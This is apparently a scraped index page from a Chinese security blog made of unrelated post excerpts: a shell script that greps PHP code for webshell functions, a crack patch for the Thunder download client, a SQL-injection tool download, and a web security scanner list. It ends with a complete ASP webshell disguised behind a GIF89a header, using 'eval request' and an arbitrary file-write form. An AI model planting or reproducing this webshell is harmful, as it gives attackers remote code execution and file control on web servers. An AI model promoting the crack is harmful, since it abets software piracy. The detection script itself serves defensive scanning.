Chinadu's Blog

From:http://neeao.com/archives/16/

#!/bin/sh

#************************************************************

#Webshell Check Shell for php

#By:Neeao

#2008/7/17 v1.0 beta

#************************************************************

HOSTIP=`ifconfig eth0 |grep 'inet addr'|awk '{print $2;}'|cut -d: -f2`

#STR=`expr index $HOSTIP "192.168"`

#if [ ${STR} -eq 1 ]

# then

# HOSTIP=`ifconfig eth1 |grep 'inet addr'|awk '{print $2;}'|cut -d: -f2`

#fi

echo $HOSTIP

LogFile=/tmp/$HOSTIP.log

rm -rf $LogFile

date +%Y-%m-%d/%H:%M >> $LogFile

echo -e "\n" >> $LogFile

echo " ---------------------------------------------------------------------------------------------------" >> $LogFile

echo "|Executive Order function:exec(\|system(\|passthru(\|shell_exec(\|popen(\|proc_open(\|pcntl_exec( |" >> $LogFile

echo " ---------------------------------------------------------------------------------------------------" >> $LogFile

echo -e "\n" >> $LogFile

grep -in 'exec(\|system(\|passthru(\|shell_exec(\|popen(\|proc_open(\|pcntl_exec(' -R * | grep -iv '_exec' >> $LogFile

echo -e "\n" >> $LogFile

echo " -------------------------------------------------------------------------------------------" >> $LogFile

echo "|Deformation of the back door coding:eval(\|base64_decode(\|gzinflate(\|gzuncompress(\|chr( |" >> $LogFile

echo " --------------------------------------------------------------------------------------------" >> $LogFile

echo -e "\n" >> $LogFile

grep -in "eval(\|base64_decode(\|gzinflate(\|gzuncompress(\|chr(" -R * >> $LogFile

echo -e "\n" >> $LogFile

echo " -----------------------------------------------------------------------------------------------------------------" >> $LogFile

echo "|File operations function:dl(\|fopen(\|readfile(\|file(\|file_get_contents(\|opendir(\|chdir(\|fwrite(\|unlink(\|glob(|" >> $LogFile

echo " -----------------------------------------------------------------------------------------------------------------" >> $LogFile

echo -e "\n" >> $LogFile

grep -in "dl(\|fopen(\|readfile(\|file(\|file_get_contents(\|opendir(\|chdir(\|fwrite(\|unlink(\|glob(" -R * >> $LogFile

echo -e "\n" >> $LogFile

echo "----------------------------------" >> $LogFile

echo "|Files inculde bug:include|require|" >> $LogFile

echo "----------------------------------" >> $LogFile

echo -e "\n" >> $LogFile

grep -in "include.*\$.\|require.*\$." -R * >> $LogFile

echo -e "\n" >> $LogFile

echo "---------------------------------------------------------" >> $LogFile

echo "|Risk code Keyword:SQLyog\|phpAdsNew\|huansuan\|fckeditor|" >> $LogFile

echo "--------------------------------------------------------" >> $LogFile

echo -e "\n" >> $LogFile

grep -in "SQLyog\|phpAdsNew\|huansuan\|fckeditor" -R * >> $LogFile

cd /tmp

tar -zcvf $HOSTIP.tar.gz $HOSTIP.log

阅读全文...

阅读全文...

ps:这两天公司开会，让各位久等了!

http://t.qq.com/invite/dfe4f65e370d0f96b089#

http://t.qq.com/invite/35a05a383ed0539a4fbd#

http://t.qq.com/invite/c8ddacb11aaf56dec275#

http://t.qq.com/invite/08c67ec0448225bfceaf#

阅读全文...

使用说明:先安装原版迅雷5 v5.9.18.1364文件(下载地址:http://down.sandai.net/Thunder5.9.18.1364.exe),安装完将补丁放入安装好的目录下(默认应该是:C:Program FilesThunder NetworkThunderProgram),然后退出迅雷打开补丁(win7下请用管理员权限打开)点Patch即可完成破解,破解完即可享受离线下载和VIP去广告等功能.

下载地址：

点我下载

利用sql server 的for xml 语法可以一次性获取多行结果，加快了注入速度。支持SQL2005/2008的注入。

下载地址：

SFX-SQLi Tool (binaries)A tool which automates the process (requires Microsoft .NET Framework 2.0) - v1.1

SFX-SQLi Tool (source code)Source code of the tool (available in VB.NET for Visual Studio 2008) - v1.1

WebVulnerableSql (ASP.NET)Vulnerable web application sample for testing (includes executable and source code)

unetbootin最新版下载地址：

http://unetbootin.sourceforge.net/

微软推出了AV下载。http://www.microsoft.com/security_essentials/

最新免费AV (AntiVirus): Microsoft Security Essentials

Microsoft Security Essentials 是一款通过正版验证的Windows电脑可以免费使用的微软安全防护软件，帮助您远离病毒和恶意软件的威胁。

官网上没有看到中文版的下载，但是理论上这个beta版会有英文，简体中文，和巴西葡萄牙文。

想下载中文版的，大牛蛙提供了下载，MSE简体中文测试版1.0下载

来源：网路游侠

在国内一些网站上经常看到文章说某某WEB应用安全评估工具排名，但是很可惜，绝大多数都是国外人搞的，界面是英文，操作也不方便，那就在这里综合下，列举下国内WEB安全评估人员常用的一些工具。当然，毫无疑问的，几乎都是商业软件，并且为了描述更准确，尽量摘取其官方网站的说明：
同时说明下：本排序不代表本人眼中的厂商或工具实力排名。

1.IBM Rational AppScan

IBM公司推出的IBM Rational AppScan产品是业界领先的应用安全测试工具，曾以 Watchfire AppScan 的名称享誉业界。Rational AppScan 可自动化 Web 应用的安全漏洞评估工作，能扫描和检测所有常见的 Web 应用安全漏洞，例如 SQL 注入（SQL-injection）、跨站点脚本攻击（cross-site scripting）及缓冲溢出（buffer overflow）等方面安全漏洞的扫描。
游侠标注：AppScan不但可以对WEB进行安全评估，更重要的是导出的报表相当实用，也是国外产品中唯一可以导出中文报告的产品，并且可以生成各种法规遵从报告，如ISO 27001、OWASP 2007等。
阅读全文...

第一款：

GIF89a$ ;<hTml>

<%eval request(chr(1))%>

<%

on error resume next

testfile=Request.form("filepath")

msg=Request.form("message")

if Trim(request("filepath"))<>"" then

set fs=server.CreateObject("scripting.filesystemobject")

set thisfile=fs.CreateTextFile(testfile,True)

thisfile.Write(""&msg& "")

if err =0 Then

response.write "<font color=red>ok</font>"

else

response.write "<font color=red>no</font>"

end if

err.clear

thisfile.close

set fs = nothing

End if

%>

<form method="POST" ACTION="">

<input type="text" size="20" name="filepath"

value="<%=server.mappath("go.asp")%>"> <BR>

<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>

<input type="submit" name="Send" value="go">

</form></body></html></body></html>

阅读全文...